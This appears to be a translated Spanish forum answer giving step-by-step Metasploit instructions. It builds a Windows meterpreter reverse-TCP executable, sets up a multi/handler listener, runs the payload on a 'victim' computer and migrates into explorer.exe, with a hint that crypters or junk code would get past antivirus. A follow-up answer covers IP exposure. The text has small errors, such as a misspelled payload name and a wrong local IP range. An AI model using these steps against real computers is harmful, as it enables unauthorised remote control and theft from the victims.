Saber que estás usando Metasploit es una buena señal, solo señala eso.
Primero, debe crear una carga útil haciendo lo siguiente:
msfpayload windows/metepreter/reverse_tcp LHOST="your local IP without quotations" LPORT="any specified port you operate on" X > filenamehere.exe
A continuación, siga estos pasos en orden por número al escribir en el terminal:
1. msfconsole
2. use exploit/multi/handler
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set LHOST "ip you used when creating the payload in the first step without quotations"
5. set LPORT "port you used when creating the payload in the first step without quotations"
6. exploit
Después de escribir exploit, y si se sigue correctamente, aparecerá un mensaje en el terminal como este:
[*] Started reverse handler on "IP Address"
[*] Starting the payload handler...
Ahora, con la carga útil que creó en el primer paso, desea ejecutarla en la máquina que está clasificando como la "víctima". Por supuesto, esto no funcionará si tiene un antivirus porque no ha sido cifrado por un cifrador o codificado con código basura para ocultar la carga útil (la carga útil). Una vez que ejecute la carga útil en la computadora víctima, obtendrá una sesión meterpreter
dentro de su terminal.
Cuando estás en la sesión meterpreter
, lo primero que debes hacer es migrar a explorer.exe y puedes hacerlo escribiendo lo siguiente en tu terminal:
ps (shows the current running processes on the computer with a number ID on the left of it)
migrate (id of explorer.exe)
Diviértete con tu sesión de meterpreter.
Sin IP pública, ¿la PC víctima puede conectarse a nuestro servidor local en máquinas virtuales?
Esto es posible, pero eso depende. Si la IP de su máquina virtual es local en su computadora, generalmente se asignará a un 198
IP. Eso es lo que siempre pasa conmigo de todos modos, por lo que se vuelve inútil para la "víctima", ya que es una IP local. Si no cifra su conexión TCP a través de VPN y la víctima tiene el conocimiento correcto, digamos, puede ver sus registros de conexión, ver sus conexiones entrantes y salientes, y sus conexiones no están cifradas y su IP pública está en a simple vista, puede ser capaz de DOX o obtener información con cualquier método que conozca.
Espero que ayude.